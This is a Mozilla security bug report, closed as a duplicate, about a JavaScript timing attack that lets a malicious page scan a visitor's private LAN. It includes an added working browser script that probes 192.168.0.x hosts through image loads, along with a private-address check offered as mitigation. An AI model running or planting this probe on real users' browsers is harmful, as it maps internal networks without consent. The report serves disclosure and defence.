Closed Bug 453230 Opened 16 years ago Closed 16 years ago

Malicious Website can scan for IP addresses and web applications on private LAN using javascript remote timing attack

Product/Component: Core :: Security (defect)
Platform: x86 / Linux
Severity: critical (Priority: Not set)
Status: RESOLVED DUPLICATE of bug 354493
Reporter: domains; Assignee: Unassigned

User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071719 Firefox/3.0.1
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071719 Firefox/3.0.1

This issue is not specific to Firefox; the example has worked in every browser that I have tried that supports JavaScript.

A malicious page can reference elements on the local area network, such as "hotlinking" images. By "hotlinking" an image on an IP "website" on the target LAN (such as http://192.168.0.1/), the attacker can test if hosts are responding based on the amount of time it takes to return an error. In an extension, once responding hosts are identified, they could be tested for the existence of common software at common URLs by testing for images (in the same method above).

Reproducible: Always

Steps to Reproduce:
(See the example page for a working demo)
1. Construct a page loading "images" from hosts on the LAN.
2. Use JavaScript to determine the time required to load the "images".
3. Differentiate between hosts based on time: hosts requiring very low or very high time are likely to be responding, or firewalled, respectively.

Actual Results:
The browser reveals an accurate map of the targeted LAN to the attacking webserver.

Expected Results:
Perhaps the browser should differentiate between hosts on the LAN and hosts on the Internet, and disallow hotlinking between public websites and private IPs.

Works in every browser (not just Firefox).
I should note that this bug has similarities to, but is not identical to, Bug 377117 which uses a timing attack to determine if a page is in the browser cache. However, this is not testing a user's cache, but rather scanning the local area network for running hosts (possibly, but not necessarily, running webservers). An article about similar timing attacks (but not addressing this particular attack) is at http://www.cs.princeton.edu/sip/pub/webtiming.pdf.
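The scan described in the steps above, as an added example that is not part of the bug report or of Mozilla's code: the browser-side image probe (steps 1 and 2), the timing classifier (step 3), and the private-address check that the Expected Results ask for. The thresholds, the sample timings and the names probeHost, classifyTiming, summarize, isPrivateIPv4 and isPrivateTarget are assumptions of this example. It also uses the load/error outcome to tell a real web server apart from a merely live host, which goes slightly beyond the report's timing-only scheme.

```javascript
// Added example, not code from the bug report: a minimal version of the
// timing scan described in comment 0 and the private-address check that the
// "Expected Results" suggests. Thresholds (FAST_MS/SLOW_MS), the probe list
// and the sample timings are constructed assumptions for illustration.

const FAST_MS = 200;   // assumed: quick connection refused / HTTP error
const SLOW_MS = 2000;  // assumed: connect hung until our own timeout

// Steps 1-2 (browser only): "hotlink" an image from the candidate host and
// time how long the load or error takes. In Node there is no Image object,
// so this function is defined but not called there.
function probeHost(url, timeoutMs = SLOW_MS) {
  return new Promise((resolve) => {
    const start = Date.now();
    const img = new Image();
    let done = false;
    const finish = (outcome) => {
      if (done) return;
      done = true;
      resolve({ url, outcome, elapsedMs: Date.now() - start });
    };
    img.onload = () => finish('load');    // a real image came back
    img.onerror = () => finish('error');  // refused, 404, or not an image
    setTimeout(() => finish('timeout'), timeoutMs);
    // Cache-busting query so the browser cache cannot answer for the host.
    img.src = url + (url.includes('?') ? '&' : '?') + 'cb=' + Math.random();
  });
}

// Step 3: a fast error means something answered (a live host with no web
// server sends a TCP RST at once; a web server sends an HTTP error page),
// while a hang until timeout means no host at that address (ARP never
// resolves on the LAN) or a firewall that silently drops the SYN. The bug
// report lumps that second case together as "firewalled".
function classifyTiming(elapsedMs, outcome = 'error') {
  if (outcome === 'load') return 'webserver';        // the image actually loaded
  if (elapsedMs < FAST_MS) return 'responding';
  if (elapsedMs >= SLOW_MS) return 'filtered-or-absent';
  return 'unknown';
}

// Summarize a list of probe results into host -> classification.
function summarize(results) {
  const map = {};
  for (const r of results) {
    map[new URL(r.url).hostname] = classifyTiming(r.elapsedMs, r.outcome);
  }
  return map;
}

// The mitigation the reporter asks for: tell private/local addresses apart
// from public ones so a public page cannot embed resources from them.
// Covers RFC 1918, loopback and link-local IPv4 literals only; a hostname
// that resolves to a private address needs a check on the resolved address.
function isPrivateIPv4(host) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(host);
  if (!m) return false;
  const [a, b, c, d] = m.slice(1).map(Number);
  if ([a, b, c, d].some((o) => o > 255)) return false;
  return a === 10
    || a === 127
    || (a === 172 && b >= 16 && b <= 31)
    || (a === 192 && b === 168)
    || (a === 169 && b === 254);
}

function isPrivateTarget(url) {
  return isPrivateIPv4(new URL(url).hostname);
}

// Constructed sample timings, as a browser on a /24 might observe them.
const SAMPLE_RESULTS = [
  { url: 'http://192.168.0.1/', outcome: 'load', elapsedMs: 35 },
  { url: 'http://192.168.0.2/', outcome: 'error', elapsedMs: 12 },
  { url: 'http://192.168.0.3/', outcome: 'timeout', elapsedMs: 2001 },
  { url: 'http://192.168.0.4/', outcome: 'error', elapsedMs: 900 },
];

if (typeof Image === 'undefined') {
  // Node: show the classification of the constructed samples.
  console.log(summarize(SAMPLE_RESULTS));
} else {
  // Browser: issue the probes for real and classify the observed timings.
  Promise.all(SAMPLE_RESULTS.map((r) => probeHost(r.url))).then((rs) =>
    console.log(summarize(rs)));
}
```

Run under Node to see the constructed samples classified; loaded in a browser, the same file issues the image probes and classifies what it actually observes. One caveat on the check: isPrivateTarget only inspects the URL literal, so a public hostname that resolves (or rebinds) to a private address passes it. A real mitigation has to apply the address test to the resolved IP at connect time, which only the browser's network layer can do.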
Product: Firefox → Core
QA Contact: firefox → toolkit
seems to be a dupe of bug 354493
Status: UNCONFIRMED → RESOLVED
Closed: 16 years ago
Resolution: --- → DUPLICATE
Group: core-security